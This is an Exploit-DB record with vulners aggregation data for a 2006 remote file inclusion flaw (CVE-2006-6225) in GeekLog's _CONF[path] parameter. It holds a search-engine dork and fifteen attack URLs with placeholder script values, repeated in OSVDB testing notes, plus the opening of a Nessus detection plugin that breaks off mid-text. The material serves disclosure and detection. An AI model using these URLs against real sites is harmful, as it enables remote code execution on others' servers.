ID EDB-ID:1963
Type exploitdb
Reporter Kw3[R]Ln
Modified 2006-06-29T00:00:00
Description
GeekLog <= 1.4.0sr3 (_CONF[path]) Remote File Include Vulnerabilities. CVE-2006-6225. Webapps exploit for php platform
---------------------------------------------------------------------------
GeekLog <= 1.4.0 (_CONF[path]) Remote File Include Vulnerabilities
---------------------------------------------------------------------------
Google d0rk: "powered by geeklog"
Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://RoSecurityGroup.net :
Remote : Yes
Critical Level : Dangerous
---------------------------------------------------------------------------
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : GeekLog
version : latest version [ 1.4 ]
URL : http://www.geeklog.net/
------------------------------------------------------------------
Exploit:
~~~~~~~~
Variable $_CONF[path] not sanitized.When register_globals=on an attacker can exploit this vulnerability with a simple php injection script.
were [path] on some cases => www.site.com/[path]/public_html/index.php
# http://www.site.com/[path]/plugins/links/functions.inc?_CONF[path]=[Evil_Script]
# http://www.site.com/[path]/plugins/polls/functions.inc?_CONF[path]=[Evil_Script]
# http://www.site.com/[path]/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=[Evil_Script]
# http://www.site.com/[path]/plugins/spamx/DeleteComment.Action.class.php?_CONF[path]=[Evil_Script]
# http://www.site.com/[path]/plugins/spamx/EditIPofURL.Admin.class.php?_CONF[path]=[Evil_Script]
# http://www.site.com/[path]/plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=[Evil_Script]
# http://www.site.com/[path]/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=[Evil_Script]
# http://www.site.com/[path]/plugins/spamx/MailAdmin.Action.class.php?_CONF[path]=[Evil_Script]
#http://www.site.com/[path]/plugins/spamx/MassDelTrackback.Admin.class.php?_CONF[path]=[Evil_Script]
# http://www.site.com/[path]/plugins/spamx/EditHeader.Admin.class.php?_CONF[path]=[Evil_Script]
# http://www.site.com/[path]/plugins/spamx/EditIP.Admin.class.php?_CONF[path]=[Evil_Script]
# http://www.site.com/[path]/plugins/spamx/IPofUrl.Examine.class.php?_CONF[path]=[Evil_Script]
# http://www.site.com/[path]/plugins/spamx/Import.Admin.class.php?_CONF[path]=[Evil_Script]
# http://www.site.com/[path]/plugins/spamx/LogView.Admin.class.php?_CONF[path]=[Evil_Script]
# http://www.site.com/[path]/plugins/staticpages/functions.inc?_CONF[path]=[Evil_Script]
---------------------------------------------------------------------------
Solution :
~~~~~~~~~~
declare variabel $_CONF[path]
---------------------------------------------------------------------------
Shoutz:
~~~~~~
# Special greetz to my good friend [Oo]
# To all members of h4cky0u.org ;) and RST [ hTTp://RoSecurityGroup.net ]
---------------------------------------------------------------------------
*/
Contact:
~~~~~~~~
Nick: Kw3rLn
E-mail: ciriboflacs[at]YaHoo[dot]Com
Homepage: hTTp://RoSecurityGroup.net
/*
-------------------------------- [ EOF] ----------------------------------
# milw0rm.com [2006-06-29]
{"id": "EDB-ID:1963", "hash": "b4264d38cfaaaba242c3a6295d0fd5ce", "type": "exploitdb", "bulletinFamily": "exploit", "title": "GeekLog <= 1.4.0sr3 - _CONFpath Remote File Include Vulnerabilities", "description": "GeekLog <= 1.4.0sr3 (_CONF[path]) Remote File Include Vulnerabilities. CVE-2006-6225. Webapps exploit for php platform", "published": "2006-06-29T00:00:00", "modified": "2006-06-29T00:00:00", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/1963/", "reporter": "Kw3[R]Ln", "references": [], "cvelist": ["CVE-2006-6225"], "lastseen": "2016-01-31T15:14:35", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 6.9, "vector": "NONE", "modified": "2016-01-31T15:14:35"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-6225"]}, {"type": "osvdb", "idList": ["OSVDB:35805", "OSVDB:35800", "OSVDB:35811", "OSVDB:35802", "OSVDB:35809", "OSVDB:35812", "OSVDB:35810", "OSVDB:35799", "OSVDB:35803", "OSVDB:35801"]}, {"type": "nessus", "idList": ["GEEKLOG_CONF_PATH_FILE_INCLUDES.NASL"]}], "modified": "2016-01-31T15:14:35"}, "vulnersScore": 6.9}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/1963/", "sourceData": "--------------------------------------------------------------------------- \nGeekLog <= 1.4.0 (_CONF[path]) Remote File Include Vulnerabilities\n---------------------------------------------------------------------------\n\nGoogle d0rk: \"powered by geeklog\"\n\n\nDiscovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://RoSecurityGroup.net :\nRemote : Yes\nCritical Level : Dangerous\n\n---------------------------------------------------------------------------\nAffected software description :\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nApplication : GeekLog \nversion : latest version [ 1.4 ]\nURL : http://www.geeklog.net/\n\n------------------------------------------------------------------\nExploit:\n~~~~~~~~\n\nVariable $_CONF[path] not sanitized.When register_globals=on an attacker can exploit this vulnerability with a simple php injection script.\n\nwere [path] on some cases => www.site.com/[path]/public_html/index.php\n\n# http://www.site.com/[path]/plugins/links/functions.inc?_CONF[path]=[Evil_Script] \n# http://www.site.com/[path]/plugins/polls/functions.inc?_CONF[path]=[Evil_Script] \n# http://www.site.com/[path]/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=[Evil_Script]\n# http://www.site.com/[path]/plugins/spamx/DeleteComment.Action.class.php?_CONF[path]=[Evil_Script]\n# http://www.site.com/[path]/plugins/spamx/EditIPofURL.Admin.class.php?_CONF[path]=[Evil_Script]\n# http://www.site.com/[path]/plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=[Evil_Script]\n# http://www.site.com/[path]/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=[Evil_Script]\n# http://www.site.com/[path]/plugins/spamx/MailAdmin.Action.class.php?_CONF[path]=[Evil_Script]\n#http://www.site.com/[path]/plugins/spamx/MassDelTrackback.Admin.class.php?_CONF[path]=[Evil_Script]\n# http://www.site.com/[path]/plugins/spamx/EditHeader.Admin.class.php?_CONF[path]=[Evil_Script]\n# http://www.site.com/[path]/plugins/spamx/EditIP.Admin.class.php?_CONF[path]=[Evil_Script]\n# http://www.site.com/[path]/plugins/spamx/IPofUrl.Examine.class.php?_CONF[path]=[Evil_Script]\n# http://www.site.com/[path]/plugins/spamx/Import.Admin.class.php?_CONF[path]=[Evil_Script]\n# http://www.site.com/[path]/plugins/spamx/LogView.Admin.class.php?_CONF[path]=[Evil_Script]\n# http://www.site.com/[path]/plugins/staticpages/functions.inc?_CONF[path]=[Evil_Script]\n\n\n\n\n---------------------------------------------------------------------------\n\nSolution :\n~~~~~~~~~~\n\ndeclare variabel $_CONF[path]\n---------------------------------------------------------------------------\n\n\nShoutz:\n~~~~~~\n\n# Special greetz to my good friend [Oo]\n# To all members of h4cky0u.org ;) and RST [ hTTp://RoSecurityGroup.net ]\n---------------------------------------------------------------------------\n\n*/\n\nContact:\n~~~~~~~~\n\nNick: Kw3rLn\nE-mail: ciriboflacs[at]YaHoo[dot]Com\nHomepage: hTTp://RoSecurityGroup.net\n/*\n\n-------------------------------- [ EOF] ----------------------------------\n\n# milw0rm.com [2006-06-29]\n", "osvdbidlist": ["35798", "35802", "35806", "35801", "35799", "35812", "35811", "35808", "35805", "35800", "35804", "35809", "35810", "35807", "35803"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:08:35", "bulletinFamily": "NVD", "description": "Multiple PHP remote file inclusion vulnerabilities in GeekLog 1.4 allow remote attackers to execute arbitrary code via a URL in the _CONF[path] parameter to (1) links/functions.inc, (2) polls/functions.inc, (3) spamx/BlackList.Examine.class.php, (4) spamx/DeleteComment.Action.class.php, (5) spamx/EditIPofURL.Admin.class.php, (6) spamx/MTBlackList.Examine.class.php, (7) spamx/MassDelete.Admin.class.php, (8) spamx/MailAdmin.Action.class.php, (9) spamx/MassDelTrackback.Admin.class.php, (10) spamx/EditHeader.Admin.class.php, (11) spamx/EditIP.Admin.class.php, (12) spamx/IPofUrl.Examine.class.php, (13) spamx/Import.Admin.class.php, (14) spamx/LogView.Admin.class.php, and (15) staticpages/functions.inc, in the plugins/ directory.", "modified": "2017-10-19T01:29:00", "id": "CVE-2006-6225", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-6225", "published": "2006-12-02T02:28:00", "title": "CVE-2006-6225", "type": "cve", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:31", "bulletinFamily": "software", "description": "## Manual Testing Notes\nhttp://[target]/[path]/plugins/polls/functions.inc?_CONF[path]=[attacker]\n## References:\n[Related OSVDB ID: 35798](https://vulners.com/osvdb/OSVDB:35798)\n[Related OSVDB ID: 35804](https://vulners.com/osvdb/OSVDB:35804)\n[Related OSVDB ID: 35805](https://vulners.com/osvdb/OSVDB:35805)\n[Related OSVDB ID: 35809](https://vulners.com/osvdb/OSVDB:35809)\n[Related OSVDB ID: 35801](https://vulners.com/osvdb/OSVDB:35801)\n[Related OSVDB ID: 35802](https://vulners.com/osvdb/OSVDB:35802)\n[Related OSVDB ID: 35803](https://vulners.com/osvdb/OSVDB:35803)\n[Related OSVDB ID: 35808](https://vulners.com/osvdb/OSVDB:35808)\n[Related OSVDB ID: 35810](https://vulners.com/osvdb/OSVDB:35810)\n[Related OSVDB ID: 35811](https://vulners.com/osvdb/OSVDB:35811)\n[Related OSVDB ID: 35812](https://vulners.com/osvdb/OSVDB:35812)\n[Related OSVDB ID: 35806](https://vulners.com/osvdb/OSVDB:35806)\n[Related OSVDB ID: 35807](https://vulners.com/osvdb/OSVDB:35807)\n[Related OSVDB ID: 35800](https://vulners.com/osvdb/OSVDB:35800)\nISS X-Force ID: 27469\nGeneric Exploit URL: http://milw0rm.com/exploits/1963\n[CVE-2006-6225](https://vulners.com/cve/CVE-2006-6225)\nBugtraq ID: 18740\n", "modified": "2006-06-29T00:00:00", "published": "2006-06-29T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:35799", "id": "OSVDB:35799", "title": "Geeklog polls/functions.inc _CONF[path] Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:31", "bulletinFamily": "software", "description": "## Manual Testing Notes\nhttp://[target]/[path]/plugins/spamx/EditIPofURL.Admin.class.php?_CONF[path]=[attacker]\n## References:\n[Related OSVDB ID: 35798](https://vulners.com/osvdb/OSVDB:35798)\n[Related OSVDB ID: 35804](https://vulners.com/osvdb/OSVDB:35804)\n[Related OSVDB ID: 35805](https://vulners.com/osvdb/OSVDB:35805)\n[Related OSVDB ID: 35809](https://vulners.com/osvdb/OSVDB:35809)\n[Related OSVDB ID: 35801](https://vulners.com/osvdb/OSVDB:35801)\n[Related OSVDB ID: 35803](https://vulners.com/osvdb/OSVDB:35803)\n[Related OSVDB ID: 35808](https://vulners.com/osvdb/OSVDB:35808)\n[Related OSVDB ID: 35810](https://vulners.com/osvdb/OSVDB:35810)\n[Related OSVDB ID: 35811](https://vulners.com/osvdb/OSVDB:35811)\n[Related OSVDB ID: 35812](https://vulners.com/osvdb/OSVDB:35812)\n[Related OSVDB ID: 35806](https://vulners.com/osvdb/OSVDB:35806)\n[Related OSVDB ID: 35807](https://vulners.com/osvdb/OSVDB:35807)\n[Related OSVDB ID: 35799](https://vulners.com/osvdb/OSVDB:35799)\n[Related OSVDB ID: 35800](https://vulners.com/osvdb/OSVDB:35800)\nISS X-Force ID: 27469\nGeneric Exploit URL: http://milw0rm.com/exploits/1963\n[CVE-2006-6225](https://vulners.com/cve/CVE-2006-6225)\nBugtraq ID: 18740\n", "modified": "2006-06-29T00:00:00", "published": "2006-06-29T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:35802", "id": "OSVDB:35802", "title": "Geeklog spamx/EditIPofURL.Admin.class.php _CONF[path] Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:31", "bulletinFamily": "software", "description": "## Manual Testing Notes\nhttp://[target]/[path]/plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=[attacker]\n## References:\n[Related OSVDB ID: 35798](https://vulners.com/osvdb/OSVDB:35798)\n[Related OSVDB ID: 35804](https://vulners.com/osvdb/OSVDB:35804)\n[Related OSVDB ID: 35805](https://vulners.com/osvdb/OSVDB:35805)\n[Related OSVDB ID: 35809](https://vulners.com/osvdb/OSVDB:35809)\n[Related OSVDB ID: 35801](https://vulners.com/osvdb/OSVDB:35801)\n[Related OSVDB ID: 35802](https://vulners.com/osvdb/OSVDB:35802)\n[Related OSVDB ID: 35808](https://vulners.com/osvdb/OSVDB:35808)\n[Related OSVDB ID: 35810](https://vulners.com/osvdb/OSVDB:35810)\n[Related OSVDB ID: 35811](https://vulners.com/osvdb/OSVDB:35811)\n[Related OSVDB ID: 35812](https://vulners.com/osvdb/OSVDB:35812)\n[Related OSVDB ID: 35806](https://vulners.com/osvdb/OSVDB:35806)\n[Related OSVDB ID: 35807](https://vulners.com/osvdb/OSVDB:35807)\n[Related OSVDB ID: 35799](https://vulners.com/osvdb/OSVDB:35799)\n[Related OSVDB ID: 35800](https://vulners.com/osvdb/OSVDB:35800)\nISS X-Force ID: 27469\nGeneric Exploit URL: http://milw0rm.com/exploits/1963\n[CVE-2006-6225](https://vulners.com/cve/CVE-2006-6225)\nBugtraq ID: 18740\n", "modified": "2006-06-29T00:00:00", "published": "2006-06-29T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:35803", "id": "OSVDB:35803", "title": "Geeklog spamx/MTBlackList.Examine.class.php _CONF[path] Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:31", "bulletinFamily": "software", "description": "## Manual Testing Notes\nhttp://[target]/[path]/plugins/spamx/IPofUrl.Examine.class.php?_CONF[path]=[attacker]\n## References:\n[Related OSVDB ID: 35798](https://vulners.com/osvdb/OSVDB:35798)\n[Related OSVDB ID: 35804](https://vulners.com/osvdb/OSVDB:35804)\n[Related OSVDB ID: 35805](https://vulners.com/osvdb/OSVDB:35805)\n[Related OSVDB ID: 35801](https://vulners.com/osvdb/OSVDB:35801)\n[Related OSVDB ID: 35802](https://vulners.com/osvdb/OSVDB:35802)\n[Related OSVDB ID: 35803](https://vulners.com/osvdb/OSVDB:35803)\n[Related OSVDB ID: 35808](https://vulners.com/osvdb/OSVDB:35808)\n[Related OSVDB ID: 35810](https://vulners.com/osvdb/OSVDB:35810)\n[Related OSVDB ID: 35811](https://vulners.com/osvdb/OSVDB:35811)\n[Related OSVDB ID: 35812](https://vulners.com/osvdb/OSVDB:35812)\n[Related OSVDB ID: 35806](https://vulners.com/osvdb/OSVDB:35806)\n[Related OSVDB ID: 35807](https://vulners.com/osvdb/OSVDB:35807)\n[Related OSVDB ID: 35799](https://vulners.com/osvdb/OSVDB:35799)\n[Related OSVDB ID: 35800](https://vulners.com/osvdb/OSVDB:35800)\nISS X-Force ID: 27469\nGeneric Exploit URL: http://milw0rm.com/exploits/1963\n[CVE-2006-6225](https://vulners.com/cve/CVE-2006-6225)\nBugtraq ID: 18740\n", "modified": "2006-06-29T00:00:00", "published": "2006-06-29T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:35809", "id": "OSVDB:35809", "title": "Geeklog spamx/IPofUrl.Examine.class.php _CONF[path] Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:31", "bulletinFamily": "software", "description": "## Manual Testing Notes\nhttp://[target]/[path]/plugins/staticpages/functions.inc?_CONF[path]=[attacker]\n## References:\n[Related OSVDB ID: 35798](https://vulners.com/osvdb/OSVDB:35798)\n[Related OSVDB ID: 35804](https://vulners.com/osvdb/OSVDB:35804)\n[Related OSVDB ID: 35805](https://vulners.com/osvdb/OSVDB:35805)\n[Related OSVDB ID: 35809](https://vulners.com/osvdb/OSVDB:35809)\n[Related OSVDB ID: 35801](https://vulners.com/osvdb/OSVDB:35801)\n[Related OSVDB ID: 35802](https://vulners.com/osvdb/OSVDB:35802)\n[Related OSVDB ID: 35803](https://vulners.com/osvdb/OSVDB:35803)\n[Related OSVDB ID: 35808](https://vulners.com/osvdb/OSVDB:35808)\n[Related OSVDB ID: 35810](https://vulners.com/osvdb/OSVDB:35810)\n[Related OSVDB ID: 35811](https://vulners.com/osvdb/OSVDB:35811)\n[Related OSVDB ID: 35806](https://vulners.com/osvdb/OSVDB:35806)\n[Related OSVDB ID: 35807](https://vulners.com/osvdb/OSVDB:35807)\n[Related OSVDB ID: 35799](https://vulners.com/osvdb/OSVDB:35799)\n[Related OSVDB ID: 35800](https://vulners.com/osvdb/OSVDB:35800)\nISS X-Force ID: 27469\nGeneric Exploit URL: http://milw0rm.com/exploits/1963\n[CVE-2006-6225](https://vulners.com/cve/CVE-2006-6225)\nBugtraq ID: 18740\n", "modified": "2006-06-29T00:00:00", "published": "2006-06-29T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:35812", "id": "OSVDB:35812", "title": "Geeklog staticpages/functions.inc _CONF[path] Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:31", "bulletinFamily": "software", "description": "## Manual Testing Notes\nhttp://[target]/[path]/plugins/spamx/Import.Admin.class.php?_CONF[path]=[attacker]\n## References:\n[Related OSVDB ID: 35798](https://vulners.com/osvdb/OSVDB:35798)\n[Related OSVDB ID: 35804](https://vulners.com/osvdb/OSVDB:35804)\n[Related OSVDB ID: 35805](https://vulners.com/osvdb/OSVDB:35805)\n[Related OSVDB ID: 35809](https://vulners.com/osvdb/OSVDB:35809)\n[Related OSVDB ID: 35801](https://vulners.com/osvdb/OSVDB:35801)\n[Related OSVDB ID: 35802](https://vulners.com/osvdb/OSVDB:35802)\n[Related OSVDB ID: 35803](https://vulners.com/osvdb/OSVDB:35803)\n[Related OSVDB ID: 35808](https://vulners.com/osvdb/OSVDB:35808)\n[Related OSVDB ID: 35811](https://vulners.com/osvdb/OSVDB:35811)\n[Related OSVDB ID: 35812](https://vulners.com/osvdb/OSVDB:35812)\n[Related OSVDB ID: 35806](https://vulners.com/osvdb/OSVDB:35806)\n[Related OSVDB ID: 35807](https://vulners.com/osvdb/OSVDB:35807)\n[Related OSVDB ID: 35799](https://vulners.com/osvdb/OSVDB:35799)\n[Related OSVDB ID: 35800](https://vulners.com/osvdb/OSVDB:35800)\nISS X-Force ID: 27469\nGeneric Exploit URL: http://milw0rm.com/exploits/1963\n[CVE-2006-6225](https://vulners.com/cve/CVE-2006-6225)\nBugtraq ID: 18740\n", "modified": "2006-06-29T00:00:00", "published": "2006-06-29T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:35810", "id": "OSVDB:35810", "title": "Geeklog spamx/Import.Admin.class.php _CONF[path] Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:31", "bulletinFamily": "software", "description": "## Manual Testing Notes\nhttp://[target]/[path]/plugins/spamx/MailAdmin.Action.class.php?_CONF[path]=[attacker]\n## References:\n[Related OSVDB ID: 35798](https://vulners.com/osvdb/OSVDB:35798)\n[Related OSVDB ID: 35804](https://vulners.com/osvdb/OSVDB:35804)\n[Related OSVDB ID: 35809](https://vulners.com/osvdb/OSVDB:35809)\n[Related OSVDB ID: 35801](https://vulners.com/osvdb/OSVDB:35801)\n[Related OSVDB ID: 35802](https://vulners.com/osvdb/OSVDB:35802)\n[Related OSVDB ID: 35803](https://vulners.com/osvdb/OSVDB:35803)\n[Related OSVDB ID: 35808](https://vulners.com/osvdb/OSVDB:35808)\n[Related OSVDB ID: 35810](https://vulners.com/osvdb/OSVDB:35810)\n[Related OSVDB ID: 35811](https://vulners.com/osvdb/OSVDB:35811)\n[Related OSVDB ID: 35812](https://vulners.com/osvdb/OSVDB:35812)\n[Related OSVDB ID: 35806](https://vulners.com/osvdb/OSVDB:35806)\n[Related OSVDB ID: 35807](https://vulners.com/osvdb/OSVDB:35807)\n[Related OSVDB ID: 35799](https://vulners.com/osvdb/OSVDB:35799)\n[Related OSVDB ID: 35800](https://vulners.com/osvdb/OSVDB:35800)\nISS X-Force ID: 27469\nGeneric Exploit URL: http://milw0rm.com/exploits/1963\n[CVE-2006-6225](https://vulners.com/cve/CVE-2006-6225)\nBugtraq ID: 18740\n", "modified": "2006-06-29T00:00:00", "published": "2006-06-29T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:35805", "id": "OSVDB:35805", "title": "Geeklog spamx/MailAdmin.Action.class.php _CONF[path] Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:31", "bulletinFamily": "software", "description": "## Manual Testing Notes\nhttp://[target]/[path]/plugins/spamx/LogView.Admin.class.php?_CONF[path]=[attacker]\n## References:\n[Related OSVDB ID: 35798](https://vulners.com/osvdb/OSVDB:35798)\n[Related OSVDB ID: 35804](https://vulners.com/osvdb/OSVDB:35804)\n[Related OSVDB ID: 35805](https://vulners.com/osvdb/OSVDB:35805)\n[Related OSVDB ID: 35809](https://vulners.com/osvdb/OSVDB:35809)\n[Related OSVDB ID: 35801](https://vulners.com/osvdb/OSVDB:35801)\n[Related OSVDB ID: 35802](https://vulners.com/osvdb/OSVDB:35802)\n[Related OSVDB ID: 35803](https://vulners.com/osvdb/OSVDB:35803)\n[Related OSVDB ID: 35808](https://vulners.com/osvdb/OSVDB:35808)\n[Related OSVDB ID: 35810](https://vulners.com/osvdb/OSVDB:35810)\n[Related OSVDB ID: 35812](https://vulners.com/osvdb/OSVDB:35812)\n[Related OSVDB ID: 35806](https://vulners.com/osvdb/OSVDB:35806)\n[Related OSVDB ID: 35807](https://vulners.com/osvdb/OSVDB:35807)\n[Related OSVDB ID: 35799](https://vulners.com/osvdb/OSVDB:35799)\n[Related OSVDB ID: 35800](https://vulners.com/osvdb/OSVDB:35800)\nISS X-Force ID: 27469\nGeneric Exploit URL: http://milw0rm.com/exploits/1963\n[CVE-2006-6225](https://vulners.com/cve/CVE-2006-6225)\nBugtraq ID: 18740\n", "modified": "2006-06-29T00:00:00", "published": "2006-06-29T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:35811", "id": "OSVDB:35811", "title": "Geeklog spamx/LogView.Admin.class.php _CONF[path] Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:31", "bulletinFamily": "software", "description": "## Manual Testing Notes\nhttp://[target]/[path]/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=[attacker]\n## References:\n[Related OSVDB ID: 35798](https://vulners.com/osvdb/OSVDB:35798)\n[Related OSVDB ID: 35804](https://vulners.com/osvdb/OSVDB:35804)\n[Related OSVDB ID: 35805](https://vulners.com/osvdb/OSVDB:35805)\n[Related OSVDB ID: 35809](https://vulners.com/osvdb/OSVDB:35809)\n[Related OSVDB ID: 35801](https://vulners.com/osvdb/OSVDB:35801)\n[Related OSVDB ID: 35802](https://vulners.com/osvdb/OSVDB:35802)\n[Related OSVDB ID: 35803](https://vulners.com/osvdb/OSVDB:35803)\n[Related OSVDB ID: 35808](https://vulners.com/osvdb/OSVDB:35808)\n[Related OSVDB ID: 35810](https://vulners.com/osvdb/OSVDB:35810)\n[Related OSVDB ID: 35811](https://vulners.com/osvdb/OSVDB:35811)\n[Related OSVDB ID: 35812](https://vulners.com/osvdb/OSVDB:35812)\n[Related OSVDB ID: 35806](https://vulners.com/osvdb/OSVDB:35806)\n[Related OSVDB ID: 35807](https://vulners.com/osvdb/OSVDB:35807)\n[Related OSVDB ID: 35799](https://vulners.com/osvdb/OSVDB:35799)\nISS X-Force ID: 27469\nGeneric Exploit URL: http://milw0rm.com/exploits/1963\n[CVE-2006-6225](https://vulners.com/cve/CVE-2006-6225)\nBugtraq ID: 18740\n", "modified": "2006-06-29T00:00:00", "published": "2006-06-29T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:35800", "id": "OSVDB:35800", "title": "Geeklog spamx/BlackList.Examine.class.php _CONF[path] Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:31", "bulletinFamily": "software", "description": "## Manual Testing Notes\nhttp://[target]/[path]/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=[attacker]\n## References:\n[Related OSVDB ID: 35798](https://vulners.com/osvdb/OSVDB:35798)\n[Related OSVDB ID: 35805](https://vulners.com/osvdb/OSVDB:35805)\n[Related OSVDB ID: 35809](https://vulners.com/osvdb/OSVDB:35809)\n[Related OSVDB ID: 35801](https://vulners.com/osvdb/OSVDB:35801)\n[Related OSVDB ID: 35802](https://vulners.com/osvdb/OSVDB:35802)\n[Related OSVDB ID: 35803](https://vulners.com/osvdb/OSVDB:35803)\n[Related OSVDB ID: 35808](https://vulners.com/osvdb/OSVDB:35808)\n[Related OSVDB ID: 35810](https://vulners.com/osvdb/OSVDB:35810)\n[Related OSVDB ID: 35811](https://vulners.com/osvdb/OSVDB:35811)\n[Related OSVDB ID: 35812](https://vulners.com/osvdb/OSVDB:35812)\n[Related OSVDB ID: 35806](https://vulners.com/osvdb/OSVDB:35806)\n[Related OSVDB ID: 35807](https://vulners.com/osvdb/OSVDB:35807)\n[Related OSVDB ID: 35799](https://vulners.com/osvdb/OSVDB:35799)\n[Related OSVDB ID: 35800](https://vulners.com/osvdb/OSVDB:35800)\nISS X-Force ID: 27469\nGeneric Exploit URL: http://milw0rm.com/exploits/1963\n[CVE-2006-6225](https://vulners.com/cve/CVE-2006-6225)\nBugtraq ID: 18740\n", "modified": "2006-06-29T00:00:00", "published": "2006-06-29T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:35804", "id": "OSVDB:35804", "title": "Geeklog spamx/MassDelete.Admin.class.php _CONF[path] Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-11-01T02:40:11", "bulletinFamily": "scanner", "description": "The version of Geeklog installed on the remote host fails to sanitize\ninput to the ", "modified": "2019-11-02T00:00:00", "id": "GEEKLOG_CONF_PATH_FILE_INCLUDES.NASL", "href": "https://www.tenable.com/plugins/nessus/21779", "published": "2006-06-29T00:00:00", "title": "Geeklog Multiple Script _CONF[path] Parameter Remote File Inclusion", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21779);\n script_version(\"1.23\");\n script_cvs_date(\"Date: 2018/11/15 20:50:17\");\n\n script_cve_id(\"CVE-2006-6225\");\n script_bugtraq_id(18740);\n script_xref(name:\"EDB-ID\", value:\"1963\");\n\n script_name(english:\"Geeklog Multiple Script _CONF[path] Parameter Remote File Inclusion\");\n script_summary(english:\"Tries to read a local file using Geeklog\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is prone to a\nremote file include attack.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Geeklog installed on the remote host fails to sanitize\ninput to the '_CONF[path]' parameter before using it in several\nscripts to include PHP code. Provided PHP's 'register_globals'\nsetting is enabled, an unauthenticated attacker may be able to exploit\nthese flaws to view arbitrary files on the remote host or to execute\narbitrary PHP code, possibly taken from third-party hosts.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.geeklog.net/article.php/so-called-exploit\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.geeklog.net/article.php/geeklog-1.4.0sr4\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Geeklog 1.4.0sr4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/06/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/06/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:geeklog:geeklog\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script 